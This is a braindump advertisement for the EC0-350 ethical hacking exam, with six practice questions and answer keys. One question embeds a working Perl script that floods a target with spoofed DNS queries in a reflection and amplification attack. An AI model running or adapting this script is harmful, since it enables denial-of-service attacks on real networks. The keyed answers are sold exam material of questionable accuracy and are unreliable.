EC0-350 Exam

EC0-350 Exam Study Guide:

EC0-350 exam is regarded as one of the most favourite Certified Ethical Hacker certifications. Many IT professionals prefer to add EC0-350 exam among their credentials. PassQuick not only caters you all the information regarding the EC0-350 exam but also provides you the excellent EC0-350 study guide which makes the certification exam easy for you.

PassQuick EC0-350 Study Guide Contents:

PassQuick EC0-350 study guide covers all the exam objectives to pass EC0-350 exam. It includes EC0-350 practice test, EC0-350 braindumps, free EC0-350 demo. you can free download PassQuick EC0-350 demo now.

PassQuick EC0-350 Feature:

* High quality - High quality and valued for the EC0-350 Exam: 100% Guarantee to Pass Your EC0-350 exam and get your Certified Ethical Hacker certification.
* Authoritative - Authoritative study guide with complete details about EC0-350 exam.
* Cheaper - Our PassQuick products are cheaper than any other website. With our completed Certified Ethical Hacker resources, you will minimize your Certified Ethical Hacker cost and be ready to pass your EC0-350 exam on Your First Try, 100% Money Back Guarantee included!
* Free - Try free Certified Ethical Hacker demo before you decide to buy it in http://www.passquick.com .

PassQuick EC0-350 Guaranteed:

By purchasing our EC0-350 exam, you will have all that is necessary for completing the EC0-350 exam with all EC0-350 study guide that is always up to date. You will receive the highest quality and support with PassQuick customer service (live chat) that will fulfill all of your certification needs. After you purchase our product, we will offer free update in time for 90 days.Purchase our EC0-350 study guide today, simply put, PassQuick is your key to opening up new doors for a brighter future!
　
　
Exam : EC-Council EC0-350
Title : Ethical Hacking and Countermeasures


1. What is the most common vehicle for social engineering attacks?
A. Email
B. Direct in person
C. Local Area Networks
D. Peer to Peer networks
Answer: B

2. You have chosen a 22 character word from the dictionary as your password. How long will it take to crack the password by an attacker?
A. 5 minutes
B. 23 days
C. 200 years
D. 16 million years
Answer: A

3. You have successfully run a buffer overflow attack against a default IIS installation running on a Windows 2000 server. The server allows you to spawn a shell. In order to perform the actions you intend to do, you need elevated permissions. You need to know what your privileges are within the shell. What are your current privileges?
A. LocalSystem
B. Administrator
C. IUSR_COMPUTERNAME
D. IIS default installation account
Answer: A

4. System administrators sometimes post questions to newsgroups when they run into technical challenges. As an ethical hacker, you could use the information in newsgroup postings to glean insight into the makeup of a target network. How would you search for these posting using Google search?
A. Search in Google using the key search strings "the target company" and "newsgroups"
B. Search for the target company name at http://groups.google.com
C. Use NNTP websites to search for these postings
D. Search in Google using the key search strings "the target company" and "forums"
Answer: B

5. A Hacker would typically use a botnet to send a large number of queries to open DNS servers. These queries will be "spoofed" to look like they come from the target of the flooding, and the DNS server will reply to that network address.
It is generally possible to stop the more-common bot-delivered attack by blocking traffic from the attacking machines, which are identifiable. But blocking queries from DNS servers brings problems in its wake. A DNS server has a valid role to play in the workings of the Internet. Blocking traffic to a DNS server could also mean blocking legitimate users from sending e-mail or visiting a Web site. A single DNS query could trigger a response that is as much as 73 times larger than the request.
The following perl code can launch these attacks.
use Net::DNS::Resolver;
use Net::RawIP;
open(LIST,"ns.list");
@list=<LIST>;
close LIST;
chomp(@list);
my $lnum=@list;
my $i=0;
my $loop=0;
if ($ARGV[0] eq '') {
print "Usage: ./hackme.pl <target IP> <loop count>n";
exit(0);
}
while($loop < $ARGV[1]) {
while($i < $lnum) {
my $source = $ARGV[0];
my $dnspkt = new Net::DNS::Packet("google.com","ANY");
my $pktdata = $dnspkt->data;
my $sock = new Net::RawIP({udp=>{}});
$sock->set({ip => { saddr => $source, daddr => $list[$i], frag_off=>0,tos=>0,id=>1565}, udp => {source => 53, dest => 53, data=>$pktdata} });
$sock->send;
$i++;
}$loop++; $i=0;}
exit(0);
What type of attacks are these?
A. DNS reflector and amplification attack
B. DNS cache poisoning attacks
C. DNS reverse connection attacks
D. DNS forward lookup attacks
Answer: A

6. What hacking attack is challenge/response authentication used to prevent?
A. Replay attacks
B. Scanning attacks
C. Session hijacking attacks
D. Password cracking attacks
Answer: A